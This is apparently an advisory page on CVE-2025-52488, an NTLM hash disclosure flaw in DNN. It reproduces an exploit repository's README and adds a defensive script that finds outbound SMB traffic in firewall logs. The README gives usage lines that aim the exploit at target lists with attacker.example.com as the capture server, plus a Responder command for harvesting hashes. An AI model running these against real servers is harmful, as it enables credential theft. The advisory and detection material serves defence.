DNN Unicode Path Normalization NTLM Hash Disclosure Vulnerability

Vulnerability Information

Vulnerability name: DNN Unicode Path Normalization NTLM Hash Disclosure Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-52488

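Vulnerability type: Information disclosure

Severity: High

Vulnerability description: This vulnerability affects the DNN (formerly DotNetNuke) platform, versions 6.0.0 up to but not including 10.0.1. DNN is a widely used open-source content management system (CMS), used mainly to build enterprise websites and web applications. Because of its flexibility and extensibility, DNN has been adopted by many organizations worldwide.

The technical root cause lies in Windows/.NET quirks and improper handling of Unicode path normalization. An attacker can use this to force the target DNN server to send requests to an attacker-controlled SMB server, leaking NTLM hashes during authentication. The attack requires no authentication and can be carried out remotely over the network.

The security risk is high because the flaw can disclose sensitive information (such as NTLM hashes), which may then be used in further attacks such as lateral movement or privilege escalation. Because the attack requires no authentication and can be automated, its potential harm is greater. Affected users are advised to update immediately to DNN 10.0.1 or later and to implement network-level controls that prevent SMB requests to external servers.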

Vendor: DNN (formerly DotNetNuke)

Product: DNN (DotNetNuke)

Affected versions: 6.0.0 to before 10.0.1

Source: https://github.com/SystemVll/CVE-2025-52488

Type: CVE-2025:github search

Repository files

  • .python-version
  • README.md
  • main.py
  • pyproject.toml
  • requirements.txt
  • uv.lock

Source overview

DNN Unicode Path Normalization NTLM Hash Disclosure Exploit (CVE-2025-52488)

Overview

This exploit targets a vulnerability in DNN (formerly DotNetNuke) versions 6.0.0 to before 10.0.1 that allows attackers to disclose NTLM hashes through Unicode path normalization attacks.

Vulnerability Details

  • CVE ID: CVE-2025-52488
  • Severity: High (CVSS 8.6)
  • Affected Versions: 6.0.0 to before 10.0.1
  • Attack Vector: Network
  • Authentication: Not required

How it Works

The exploit abuses Windows/.NET quirks and Unicode normalization to force the target DNN server to make SMB requests to an attacker-controlled server, potentially exposing NTLM hashes during the authentication process.

Prerequisites

  1. Python 3.7+
  2. Required packages (install with pip install -r requirements.txt)
  3. SMB server to capture NTLM hashes (e.g., Responder, Burp Collaborator)

Usage

Basic Usage

    python main.py targets.txt attacker.example.com

With Custom Parameters

    python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

Arguments

  • targets: File containing list of DNN hosts (one per line)
  • smb_server: SMB server hostname/IP to capture NTLM hashes
  • -t, --threads: Number of concurrent threads (default: 10)
  • --timeout: Request timeout in seconds (default: 10)

Target File Format

Create a text file with target URLs, one per line:

    http://target1.example.com
    https://target2.example.com:8080
    target3.example.com

Setting Up SMB Server

You can use tools like Responder to capture NTLM hashes:

    responder -I eth0 -wrf

Or use Burp Collaborator for out-of-band detection.

Example Output

    [2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
    [2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
    [2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
    [2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
    [2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
    [2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

Detection Indicators

The exploit looks for the following DNN indicators:

  • dnn_IsMobile cookie
  • dotnetnuke in response
  • dnnconnect in response
  • DNN Platform in response

Mitigation

  • Update DNN to version 10.0.1 or later
  • Implement network-level controls to prevent SMB requests to external servers
  • Monitor for suspicious file upload attempts
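
To verify the second mitigation on a DNN host, the following added example (not part of the repository or of DNN) scans a Windows Firewall log for outbound SMB connections to destinations outside the internal network. It assumes the pfirewall.log layout with logging of dropped and successful connections enabled and treats RFC 1918 ranges as internal; the log lines and addresses are constructed samples.

```python
import ipaddress

# Assumption: RFC 1918 and loopback ranges are "internal"; adjust to your address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
SMB_PORTS = {"139", "445"}

# Constructed sample in Windows Firewall log (pfirewall.log) layout.
SAMPLE_LOG = """\
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2025-07-14 10:15:01 ALLOW TCP 10.0.5.20 10.0.1.10 49800 445 0 - 0 0 0 - - - SEND
2025-07-14 10:15:02 ALLOW TCP 10.0.5.20 203.0.113.50 49812 445 0 - 0 0 0 - - - SEND
2025-07-14 10:15:03 DROP TCP 10.0.5.20 198.51.100.7 49813 445 0 - 0 0 0 - - - SEND
2025-07-14 10:15:04 ALLOW TCP 10.0.5.20 203.0.113.50 49814 443 0 - 0 0 0 - - - SEND
2025-07-14 10:15:05 ALLOW TCP 198.51.100.9 10.0.5.20 51000 445 0 - 0 0 0 - - - RECEIVE
"""

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip.version == net.version and ip in net for net in INTERNAL_NETS)

def external_smb_egress(log_text):
    """Return outbound SMB connection records whose destination is not internal."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names come from the header
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("protocol") != "TCP" or rec.get("dst-port") not in SMB_PORTS:
            continue
        if rec.get("path", "SEND") != "SEND":  # inbound traffic is out of scope here
            continue
        try:
            if is_internal(rec["dst-ip"]):
                continue
        except (KeyError, ValueError):         # malformed or missing address
            continue
        hits.append((f'{rec.get("date")} {rec.get("time")}', rec.get("src-ip"),
                     rec["dst-ip"], rec["dst-port"], rec.get("action")))
    return hits

if __name__ == "__main__":
    for hit in external_smb_egress(SAMPLE_LOG):
        print("external SMB egress:", *hit)
```

An ALLOW hit means the egress control is missing and the host completed an SMB connection to an external address; a DROP hit means the control held but something on the server attempted the connection and should be investigated.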

Disclaimer

This tool is for educational and authorized security testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.

http://example.com/2025/07/14/github_3222337652/
Author: lianccc
Published: July 14, 2025